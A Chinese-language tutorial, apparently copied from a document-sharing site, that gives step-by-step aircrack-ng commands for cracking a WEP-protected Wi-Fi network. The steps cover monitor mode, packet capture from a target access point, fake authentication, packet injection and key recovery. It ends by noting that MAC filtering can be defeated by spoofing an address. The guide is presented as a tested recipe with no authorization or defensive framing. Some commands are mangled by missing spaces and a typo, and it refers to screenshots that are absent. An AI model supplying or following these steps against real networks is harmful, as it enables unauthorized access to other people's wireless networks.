破解无线网密码教程

2024年2月6日发(作者：)

破解无线网密码教程！！亲测成功！！

首先需要下载aircrack-ng软件包：

地址：/zh-cn/jaunty/i386/aircrack-ng/download

安装完成后：

开始破解：

1、启动无线网卡的监控模式，在终端中输入：sudoairmon-ng start wlan0

(wlan0是无线网卡的端口,可在终端中输入ifconfig查看)

2、查看无线AP在终端中输入：sudoairodump-ng mon0

(特别说明：启动监控模式后无线网的端口现在是 mon0)

看看有哪些采用wep加密的AP在线，然后按ctrl+c退出，保留终端

3、抓包

另开一个终端，输入：

sudoairodump-ng -c 6 --bssid

AP's MAC -w wep mon0

-c 后面跟着的6是要破解的AP工作频道

--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址

-w后面跟着wep的是抓下来的数据包DATA保存的文件名

具体情况根据步骤2里面的在线AP更改频道和MAC地址

DATA保存的文件名可随便命名

4、与AP建立虚拟连接

输入命令：iwlist wlan0 scanning 可查看自己的MAC地址

再另开一个终端，输入：

sudoaireplay-ng -1 0 -a

AP's MAC -h

My MAC mon0

-h后面跟着的My MAC是自己的无线网卡的MAC地址

5、进行注入

成功建立虚拟连接后输入：

sudoaireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b

AP's MAC -h

My MAC mon0

现在回头看下步骤3的终端是不是DATA在开始飞涨!

6、解密

收集有5000个以上的DATA之后，另开一个终端，输入：

sudoaircrack-ngwep*.cap

下载本文档之后将黄色区域颜色调为其他颜色即可看见代码！

进行解密，第一次未成功：

如果没算出来的话，继续等，aircrack-ng会在DATA每增加多5000个之后就自动再运行，直到算出密码为止

又没成功：

KEY FOUND！最后终于成功了：

7、收工

破解出密码后在终端中输入 sudoairmon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。

附：MAC地址过滤方法

MAC地址即网卡的ID号，每个网卡都一个全世界唯一的ID号，是一个12位的16进制号码，其中前4位是网卡厂家的代码，是世界标准化组织统一分配的，后面是网卡代码。

无线mac 地址过滤功能通过mac 地址允许或拒绝无线网络中的计算机访问广域网，有效控制无线网络内用户的上网权限。

MAC地址过滤是在路由器中有一个过滤表，凡是表中登记的网卡，就可以通过路由器上网（或禁止上网）。如果某个网卡的ID号码没有在路由器中登记，就不能连上。

但是，无线mac 地址过滤功能并不彻底，可以通过修改MAC的方式突破MAC地址过滤